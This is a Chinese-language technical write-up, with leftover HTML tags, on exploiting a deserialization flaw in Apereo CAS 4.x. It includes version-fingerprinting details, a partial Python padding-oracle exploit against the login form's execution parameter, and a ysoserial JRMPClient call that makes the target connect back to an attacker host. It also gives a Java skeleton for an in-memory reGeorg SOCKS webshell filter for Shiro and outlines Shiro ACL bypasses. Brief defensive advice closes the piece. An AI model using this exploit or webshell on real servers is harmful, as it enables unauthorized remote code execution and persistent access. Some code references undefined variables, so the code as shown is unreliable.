Apereo CAS 4.X 反序列化漏洞分析与利用技术详解<\/h1>

1. 漏洞概述<\/h2>
Apereo CAS (Central Authentication Service) 4.X 版本中存在一个严重的反序列化漏洞，攻击者可以通过精心构造的`execution<\/code>参数实现远程代码执行(RCE)。该漏洞主要影响CAS 4.1.6及更早版本，在4.1.7版本中加密方式发生了变化，修复了此漏洞。<\/p>`

2. 漏洞版本识别<\/h2>
2.1 版本特征判断<\/h3>
CAS 4.1.6及之前版本特征<\/strong>：<\/p>

execution<\/code>参数Base64解码后以\x00\x00\x00\x22\x00\x00\x00\x10<\/code>开头<\/li>
<\/ul>
CAS 4.1.7及之后版本特征<\/strong>：<\/p>

execution<\/code>参数两次Base64解码后不是乱码，而是JWS格式(header.body.sign)的字符串<\/li>
<\/ul>
2.2 加密方式差异<\/h3>
CAS 4.x - 4.1.6加密伪代码<\/strong>：<\/p>
payload =<\/span> gzip(Java Serialized data)
<\/span><\/span>body =<\/span> aes128_cbc_encode(key, iv, payload))
<\/span><\/span>header =<\/span> '<\/span>\x00\x00\x00\x22\x00\x00\x00\x10<\/span>'<\/span>+<\/span>iv+<\/span>'<\/span>\x00\x00\x00\x06<\/span>'<\/span>+<\/span>'aes128'<\/span>
<\/span><\/span>excution =<\/span> uuid +<\/span> b64encode(header +<\/span> body)
<\/span><\/span><\/code><\/pre>CAS 4.1.7 ~ 4.2.X加密伪代码<\/strong>：<\/p>
cipher =<\/span> aes128_cbc_encode(iv +<\/span> gzip(Java Serialized data))
<\/span><\/span>data =<\/span> b64encode(cipher)
<\/span><\/span>jwsToken =<\/span> jws.<\/span>sign(data, jws_key, algorithm=<\/span>'HS512'<\/span>)
<\/span><\/span>excution =<\/span> uuid +<\/span> b64encode(jwsToken)
<\/span><\/span><\/code><\/pre>3. 漏洞利用技术<\/h2>
3.1 Padding Oracle攻击<\/h3>
由于CAS 4.1.6及之前版本使用AES\/CBC加密模式，存在Padding Oracle攻击的可能性。攻击流程如下：<\/p>

构造恶意Java序列化payload<\/li>
使用gzip压缩payload<\/li>
通过Padding Oracle攻击获取正确的加密块<\/li>
构造最终的execution参数<\/li>
<\/ol>
3.2 利用工具实现<\/h3>
以下是关键的Python实现代码片段：<\/p>
from<\/span> jose import<\/span> jws
<\/span><\/span>from<\/span> Crypto.Cipher import<\/span> AES
<\/span><\/span>from<\/span> cStringIO import<\/span> StringIO
<\/span><\/span>from<\/span> multiprocessing.pool import<\/span> ThreadPool
<\/span><\/span>import<\/span> time
<\/span><\/span>import<\/span> requests
<\/span><\/span>import<\/span> base64
<\/span><\/span>import<\/span> zlib
<\/span><\/span>import<\/span> uuid
<\/span><\/span>import<\/span> binascii
<\/span><\/span>import<\/span> json
<\/span><\/span>import<\/span> subprocess
<\/span><\/span>import<\/span> requests
<\/span><\/span>import<\/span> re
<\/span><\/span>
<\/span><\/span># 初始化参数<\/span>
<\/span><\/span>iv =<\/span> uuid.<\/span>uuid4().<\/span>bytes
<\/span><\/span>header_mode =<\/span> '<\/span>\x00\x00\x00\x22\x00\x00\x00\x10<\/span>{iv}<\/span>\x00\x00\x00\x06<\/span>aes128'<\/span>
<\/span><\/span>JAR_FILE =<\/span> 'ysoserial-0.0.6-SNAPSHOT-all.jar'<\/span>
<\/span><\/span>
<\/span><\/span># 压缩函数<\/span>
<\/span><\/span>def<\/span> compress<\/span>(data):
<\/span><\/span>    gzip_compress =<\/span> zlib.<\/span>compressobj(9<\/span>, zlib.<\/span>DEFLATED, zlib.<\/span>MAX_WBITS |<\/span> 16<\/span>)
<\/span><\/span>    data =<\/span> gzip_compress.<\/span>compress(data) +<\/span> gzip_compress.<\/span>flush()
<\/span><\/span>    return<\/span> data
<\/span><\/span>
<\/span><\/span># Padding Oracle攻击实现<\/span>
<\/span><\/span>def<\/span> paddingOracle<\/span>(value):
<\/span><\/span>    fakeiv =<\/span> list(chr(0<\/span>)*<\/span>16<\/span>)
<\/span><\/span>    intermediary_value_reverse =<\/span> []
<\/span><\/span>    for<\/span> i in<\/span> range(0<\/span>, 16<\/span>):
<\/span><\/span>        num =<\/span> 16<\/span>
<\/span><\/span>        response_result =<\/span> []
<\/span><\/span>        for<\/span> j in<\/span> range(0<\/span>, 256<\/span>-<\/span>num+<\/span>1<\/span>, num):
<\/span><\/span>            jobs =<\/span> []
<\/span><\/span>            pool =<\/span> ThreadPool(num)
<\/span><\/span>            for<\/span> w in<\/span> range(j, j+<\/span>num):
<\/span><\/span>                fakeiv[N-<\/span>1<\/span>-<\/span>i] =<\/span> chr(w)
<\/span><\/span>                fake_iv =<\/span> ''<\/span>.<\/span>join(fakeiv)
<\/span><\/span>                paramsPost =<\/span> {
<\/span><\/span>                    "execution"<\/span>: "4a538b9e-ecfe-4c95-bcc0-448d0d93f494_"<\/span> +<\/span> base64.<\/span>b64encode(header +<\/span> body +<\/span> fake_iv +<\/span> value),
<\/span><\/span>                    "password"<\/span>: "admin"<\/span>,
<\/span><\/span>                    "submit"<\/span>: "LOGIN"<\/span>,
<\/span><\/span>                    "_eventId"<\/span>: "submit"<\/span>,
<\/span><\/span>                    "lt"<\/span>: "LT-5-pE3Oo6oDNFQUZDdapssDyN4C749Ga0-cas01.example.org"<\/span>,
<\/span><\/span>                    "username"<\/span>: "admin"<\/span>
<\/span><\/span>                }
<\/span><\/span>                job =<\/span> pool.<\/span>apply_async(send_request, (paramsPost, w))
<\/span><\/span>                jobs.<\/span>append(job)
<\/span><\/span>            pool.<\/span>close()
<\/span><\/span>            pool.<\/span>join()
<\/span><\/span>            for<\/span> w in<\/span> jobs:
<\/span><\/span>                j_value, response =<\/span> w.<\/span>get()
<\/span><\/span>                if<\/span> response.<\/span>status_code ==<\/span> 200<\/span>:
<\/span><\/span>                    response_result.<\/span>append(j_value)
<\/span><\/span>        # ... 省略中间处理逻辑 ...<\/span>
<\/span><\/span>    intermediary_value =<\/span> intermediary_value_reverse[::-<\/span>1<\/span>]
<\/span><\/span>    return<\/span> intermediary_value
<\/span><\/span><\/code><\/pre>3.3 利用链选择<\/h3>
为了缩短攻击时间，推荐使用JRMPClient gadget：<\/p>

传统CC链<\/strong>：需要padding约114组数据，耗时过长<\/li>
JRMPClient<\/strong>：

普通利用：需要padding约14组数据，耗时1-3小时<\/li>
优化利用(CVE-2018-2628)：仅需padding 7组数据，多线程下可在20分钟内完成<\/li>
<\/ul>
<\/li>
<\/ol>
if<\/span> __name__ ==<\/span> '__main__'<\/span>:
<\/span><\/span>    popen =<\/span> subprocess.<\/span>Popen(['java'<\/span>, '-jar'<\/span>, JAR_FILE, 'JRMPClient2'<\/span>, 'your_ip:your_port'<\/span>], stdout=<\/span>subprocess.<\/span>PIPE)
<\/span><\/span>    payload =<\/span> popen.<\/span>stdout.<\/span>read()
<\/span><\/span>    payload =<\/span> pad_string(compress(payload))
<\/span><\/span>    # ... 后续处理 ...<\/span>
<\/span><\/span><\/code><\/pre>4. Shiro RCE与ACL绕过技术<\/h2>
4.1 无文件Socks5代理Webshell<\/h3>
在Shiro环境下，由于Shiro本身是Filter，内存马最好也实现为Filter（设置最高优先级）。以下是关键代码：<\/p>
package<\/span> reGeorg;<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> javax.servlet.*;<\/span>
<\/span><\/span>import<\/span> java.io.IOException;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> MemReGeorg<\/span> implements<\/span> javax.<\/span>servlet<\/span>.<\/span>Filter<\/span> {<\/span>
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> void<\/span> doFilter<\/span>(<\/span>ServletRequest request1,<\/span> ServletResponse response1,<\/span> FilterChain filterChain)<\/span> 
<\/span><\/span>            throws<\/span> IOException,<\/span> ServletException {<\/span>
<\/span><\/span>        javax.<\/span>servlet<\/span>.<\/span>http<\/span>.<\/span>HttpServletRequest<\/span> request =<\/span> (<\/span>javax.<\/span>servlet<\/span>.<\/span>http<\/span>.<\/span>HttpServletRequest<\/span>)<\/span> request1;<\/span>
<\/span><\/span>        javax.<\/span>servlet<\/span>.<\/span>http<\/span>.<\/span>HttpServletResponse<\/span> response =<\/span> (<\/span>javax.<\/span>servlet<\/span>.<\/span>http<\/span>.<\/span>HttpServletResponse<\/span>)<\/span> response1;<\/span>
<\/span><\/span>        javax.<\/span>servlet<\/span>.<\/span>http<\/span>.<\/span>HttpSession<\/span> session =<\/span> request.<\/span>getSession<\/span>();<\/span>
<\/span><\/span>        
<\/span><\/span>        String cmd =<\/span> request.<\/span>getHeader<\/span>(<\/span>"X-CMD"<\/span>);<\/span>
<\/span><\/span>        if<\/span> (<\/span>cmd !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>            response.<\/span>setHeader<\/span>(<\/span>"X-STATUS"<\/span>,<\/span> "OK"<\/span>);<\/span>
<\/span><\/span>            if<\/span> (<\/span>cmd.<\/span>compareTo<\/span>(<\/span>"CONNECT"<\/span>)<\/span> ==<\/span> 0<\/span>)<\/span> {<\/span>
<\/span><\/span>                \/\/ 建立连接逻辑
<\/span><\/span><\/span><\/span>            }<\/span> else<\/span> if<\/span> (<\/span>cmd.<\/span>compareTo<\/span>(<\/span>"DISCONNECT"<\/span>)<\/span> ==<\/span> 0<\/span>)<\/span> {<\/span>
<\/span><\/span>                \/\/ 断开连接逻辑
<\/span><\/span><\/span><\/span>            }<\/span> else<\/span> if<\/span> (<\/span>cmd.<\/span>compareTo<\/span>(<\/span>"READ"<\/span>)<\/span> ==<\/span> 0<\/span>)<\/span> {<\/span>
<\/span><\/span>                \/\/ 读取数据逻辑
<\/span><\/span><\/span><\/span>            }<\/span> else<\/span> if<\/span> (<\/span>cmd.<\/span>compareTo<\/span>(<\/span>"FORWARD"<\/span>)<\/span> ==<\/span> 0<\/span>)<\/span> {<\/span>
<\/span><\/span>                \/\/ 转发数据逻辑
<\/span><\/span><\/span><\/span>            }<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        filterChain.<\/span>doFilter<\/span>(<\/span>request1,<\/span> response1);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    \/\/ ... 省略其他方法 ...
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>4.2 Shiro权限绕过技术<\/h3>

寻找新的权限绕过方法<\/strong>：通过分析Shiro的权限校验机制，寻找可能的绕过点<\/li>
利用已知漏洞<\/strong>：参考已公开的Shiro权限绕过issue<\/li>
组合利用<\/strong>：结合AJP协议漏洞实现文件上传和RCE<\/li>
<\/ol>
5. 防御建议<\/h2>

升级CAS版本<\/strong>：升级到4.1.7或更高版本<\/li>
密钥保护<\/strong>：确保加密密钥的安全存储，避免使用默认密钥<\/li>
输入验证<\/strong>：对execution参数进行严格的格式验证<\/li>
网络隔离<\/strong>：限制CAS服务器的出站连接，防止JRMP反弹shell<\/li>
监控日志<\/strong>：密切关注异常登录请求和Padding Oracle攻击特征<\/li>
<\/ol>
6. 总结<\/h2>
本文详细分析了Apereo CAS 4.X版本中的反序列化漏洞，从版本识别、加密方式差异到具体的Padding Oracle攻击实现，提供了完整的技术细节。同时介绍了在Shiro环境下的RCE利用和权限绕过技术，为安全研究人员提供了全面的参考。在实际渗透测试中，应根据目标环境选择合适的利用方式，并注意攻击的时间成本和成功率。<\/p>